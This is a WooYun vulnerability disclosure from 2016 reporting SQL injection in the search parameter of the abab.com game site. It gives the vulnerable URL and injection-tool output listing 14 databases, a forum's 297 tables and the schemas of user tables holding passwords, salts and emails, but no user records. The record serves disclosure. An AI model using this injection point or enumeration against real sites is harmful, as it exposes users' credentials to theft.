当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0203591

漏洞标题:游戏安全之ABAB小游戏存在严重安全缺陷(涉及整站用户50W+用户)

相关厂商:abab.com

漏洞作者: Exploit DB

提交时间:2016-05-05 14:52

修复时间:2016-05-10 15:00

公开时间:2016-05-10 15:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-05: 细节已通知厂商并且等待厂商处理中
2016-05-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

影响14库 50W+用户信息泄露

详细说明:

http://m.abab.com/index.php?a=Search&keyWord=会说话的狗狗本


QQ截图20160425193331.png


available databases [14]:
[*] abab
[*] abab_article
[*] abab_bbs
[*] abab_comment
[*] abab_faka
[*] abab_kaifu
[*] abab_play
[*] abab_soft
[*] abab_spreader
[*] abab_youxi
[*] abab_youxi_soft
[*] abab_youxiku
[*] information_schema
[*] test


原谅我开服务器跑了两个小时才跑完一个库

Database: abab_bbs
[297 tables]
+-------------------------------+
| common_admincp_cmenu |
| common_admincp_group |
| common_admincp_member |
| common_admincp_perm |
| common_admincp_session |
| common_admingroup |
| common_adminnote |
| common_advertisement |
| common_advertisement_custom |
| common_banned |
| common_block |
| common_block_favorite |
| common_block_item |
| common_block_item_data |
| common_block_permission |
| common_block_pic |
| common_block_style |
| common_block_xml |
| common_cache |
| common_card |
| common_card_log |
| common_card_type |
| common_connect_guest |
| common_credit_log |
| common_credit_rule |
| common_credit_rule_log |
| common_credit_rule_log_field |
| common_cron |
| common_devicetoken |
| common_district |
| common_diy_data |
| common_domain |
| common_failedlogin |
| common_friendlink |
| common_grouppm |
| common_invite |
| common_magic |
| common_magiclog |
| common_mailcron |
| common_mailqueue |
| common_member |
| common_member_action_log |
| common_member_connect |
| common_member_count |
| common_member_crime |
| common_member_field_forum |
| common_member_field_home |
| common_member_grouppm |
| common_member_log |
| common_member_magic |
| common_member_medal |
| common_member_profile |
| common_member_profile_setting |
| common_member_security |
| common_member_stat_field |
| common_member_status |
| common_member_validate |
| common_member_verify |
| common_member_verify_info |
| common_myapp |
| common_myinvite |
| common_mytask |
| common_nav |
| common_onlinetime |
| common_patch |
| common_plugin |
| common_pluginvar |
| common_process |
| common_regip |
| common_relatedlink |
| common_report |
| common_searchindex |
| common_secquestion |
| common_session |
| common_setting |
| common_smiley |
| common_sphinxcounter |
| common_stat |
| common_statuser |
| common_style |
| common_stylevar |
| common_syscache |
| common_tag |
| common_tagitem |
| common_task |
| common_taskvar |
| common_template |
| common_template_block |
| common_template_permission |
| common_uin_black |
| common_usergroup |
| common_usergroup_field |
| common_word |
| common_word_type |
| connect_disktask |
| connect_feedlog |
| connect_memberbindlog |
| connect_postfeedlog |
| connect_tthreadlog |
| forum_access |
| forum_activity |
| forum_activityapply |
| forum_announcement |
| forum_attachment |
| forum_attachment_0 |
| forum_attachment_1 |
| forum_attachment_2 |
| forum_attachment_3 |
| forum_attachment_4 |
| forum_attachment_5 |
| forum_attachment_6 |
| forum_attachment_7 |
| forum_attachment_8 |
| forum_attachment_9 |
| forum_attachment_exif |
| forum_attachment_unused |
| forum_attachtype |
| forum_baidu_user |
| forum_bbcode |
| forum_collection |
| forum_collectioncomment |
| forum_collectionfollow |
| forum_collectioninvite |
| forum_collectionrelated |
| forum_collectionteamworker |
| forum_collectionthread |
| forum_creditslog |
| forum_debate |
| forum_debatepost |
| forum_faq |
| forum_forum |
| forum_forum_threadtable |
| forum_forumfield |
| forum_forumrecommend |
| forum_groupcreditslog |
| forum_groupfield |
| forum_groupinvite |
| forum_grouplevel |
| forum_groupuser |
| forum_imagetype |
| forum_medal |
| forum_medallog |
| forum_memberrecommend |
| forum_moderator |
| forum_modwork |
| forum_onlinelist |
| forum_order |
| forum_poll |
| forum_polloption |
| forum_pollvoter |
| forum_post |
| forum_post_location |
| forum_post_moderate |
| forum_post_tableid |
| forum_postcache |
| forum_postcomment |
| forum_postlog |
| forum_poststick |
| forum_promotion |
| forum_ratelog |
| forum_relatedthread |
| forum_replycredit |
| forum_rsscache |
| forum_spacecache |
| forum_statlog |
| forum_thread |
| forum_thread_moderate |
| forum_threadaddviews |
| forum_threadclass |
| forum_threadclosed |
| forum_threaddisablepos |
| forum_threadimage |
| forum_threadlog |
| forum_threadmod |
| forum_threadpartake |
| forum_threadpreview |
| forum_threadrush |
| forum_threadtype |
| forum_trade |
| forum_tradecomment |
| forum_tradelog |
| forum_typeoption |
| forum_typeoptionvar |
| forum_typevar |
| forum_warning |
| gamepk |
| gamepk_cate |
| gamepk_comment |
| gamepk_config |
| gamepk_gold |
| gamepk_gold_log |
| gamepk_log |
| gamepk_seo |
| home_album |
| home_album_category |
| home_appcreditlog |
| home_blacklist |
| home_blog |
| home_blog_category |
| home_blog_moderate |
| home_blogfield |
| home_class |
| home_click |
| home_clickuser |
| home_comment |
| home_comment_moderate |
| home_docomment |
| home_doing |
| home_doing_moderate |
| home_favorite |
| home_feed |
| home_feed_app |
| home_follow |
| home_follow_feed |
| home_follow_feed_archiver |
| home_friend |
| home_friend_request |
| home_friendlog |
| home_notification |
| home_pic |
| home_pic_moderate |
| home_picfield |
| home_poke |
| home_pokearchive |
| home_share |
| home_share_moderate |
| home_show |
| home_specialuser |
| home_userapp |
| home_userappfield |
| home_visitor |
| mobile_setting |
| portal_article_content |
| portal_article_count |
| portal_article_moderate |
| portal_article_related |
| portal_article_title |
| portal_article_trash |
| portal_attachment |
| portal_category |
| portal_category_permission |
| portal_comment |
| portal_comment_moderate |
| portal_rsscache |
| portal_topic |
| portal_topic_pic |
| security_evilpost |
| security_eviluser |
| security_failedlog |
| strayer_article |
| strayer_article_content |
| strayer_article_title |
| strayer_category |
| strayer_evo |
| strayer_evo_log |
| strayer_evolution |
| strayer_fastpick |
| strayer_member |
| strayer_picker |
| strayer_rules |
| strayer_searchindex |
| strayer_setting |
| strayer_timing |
| strayer_url |
| strayer_user |
| ucenter_admins |
| ucenter_applications |
| ucenter_badwords |
| ucenter_domains |
| ucenter_failedlogins |
| ucenter_feeds |
| ucenter_friends |
| ucenter_mailqueue |
| ucenter_memberfields |
| ucenter_members |
| ucenter_members_copy |
| ucenter_mergemembers |
| ucenter_newpm |
| ucenter_notelist |
| ucenter_pm_indexes |
| ucenter_pm_lists |
| ucenter_pm_members |
| ucenter_pm_messages_0 |
| ucenter_pm_messages_1 |
| ucenter_pm_messages_2 |
| ucenter_pm_messages_3 |
| ucenter_pm_messages_4 |
| ucenter_pm_messages_5 |
| ucenter_pm_messages_6 |
| ucenter_pm_messages_7 |
| ucenter_pm_messages_8 |
| ucenter_pm_messages_9 |
| ucenter_protectedmembers |
| ucenter_settings |
| ucenter_sqlcache |
| ucenter_tags |
| ucenter_vars |
+-------------------------------+


QQ截图20160425193331.png


Database: abab_bbs
Table: ucenter_members
[12 columns]
+---------------+-----------------------+
| Column | Type |
+---------------+-----------------------+
| email | char(32) |
| lastloginip | int(10) |
| lastlogintime | int(10) unsigned |
| myid | char(30) |
| myidkey | char(16) |
| password | char(32) |
| regdate | int(10) unsigned |
| regip | char(15) |
| salt | char(6) |
| secques | char(8) |
| uid | mediumint(8) unsigned |
| username | char(50) |
+---------------+-----------------------+
Database: abab_bbs
Table: common_member
[22 columns]
+--------------------+-----------------------+
| Column | Type |
+--------------------+-----------------------+
| eailstatus |
| accessmasks | tinyint(1) |
| adminid | tinyint(1) |
| allowadmincp | tinyint(1) |
| avatarstatus | tinyint(1) |
| conisbind | tinyint(1) unsigned |
| credits | int(10) |
| email | char(40) |
| extgroupids | char(20) |
| groupdxpiry |
| groupid | smallint(6) unsigned |
| newpm | smallint(6) unsigned |
| newprompt | smallint(6) unsigned |
| notifysound | tinyint(1) |
| onlyacceptfriendpm | tinyint(1) |
| password | char(32) |
| regdate | int(10) unsigned |
| status | tinyint(1) |
| timeoffset | char(4) |
| uid | mediumint(8) unsigned |
| username | char(15) |
| videophotostatus | tinyint(1) |
+--------------------+-----------------------+


还有几个库没跑 估计开了这么多年的游戏网站起码得有百万+用户 还请审核们考证

漏洞证明:

修复方案:

版权声明:转载请注明来源 Exploit DB@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-05-10 15:00

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价